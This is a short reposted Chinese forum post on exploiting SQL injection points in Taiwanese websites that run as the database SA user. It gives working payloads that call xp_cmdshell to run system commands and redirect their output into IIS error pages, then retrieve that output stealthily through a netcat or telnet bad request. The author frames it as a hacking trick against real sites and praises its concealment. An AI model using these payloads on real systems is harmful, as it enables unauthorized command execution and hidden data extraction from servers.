[转载]把结果输出到400.HTM
来源:kEvin1986's BloG碰到几个台湾的SQL注入点,SA的用户。遮屏了返回信息,TCP/IP筛选开启。NBSI不能用,大概语句有冲突。
首先手工的注入得到
id=605;exec master..xp_cmdshell 'net start >%25windir%25\help\iisHelp\common\404b.htm。
然后打开个不存在的页面,居然返回“出错了哦~~页面找不到了嘛……”
我晕。这么亲切暧昧的,但是我不吃这套
经过0.0001秒的思考之后,我想到了nc,想到了IIS 400 BAD REQUEST。
这种方法的好处是,如果ASP或者IIS遮屏了默认的404 NOT FOUND页面,那么就可以利用这种方法从BAD REQUEST里得到。
id=605;exec master..xp_cmdshell 'net start >%25windir%25\help\iisHelp\common\400.htm。
然后用NC或者TELNET连接,随便写一些字符,然后回车。
得到了返回的内容。这个不错~呵呵,而且404的弊端在于出现的几率很高。很多人都可能看见。而400很少出现。。。这个就是隐蔽性。OK
完了后突然想到这句话,如果给了你SYSTEM权限你还搞不定,你还是别混了。呵呵(好象之前没人说过)
页:
[1]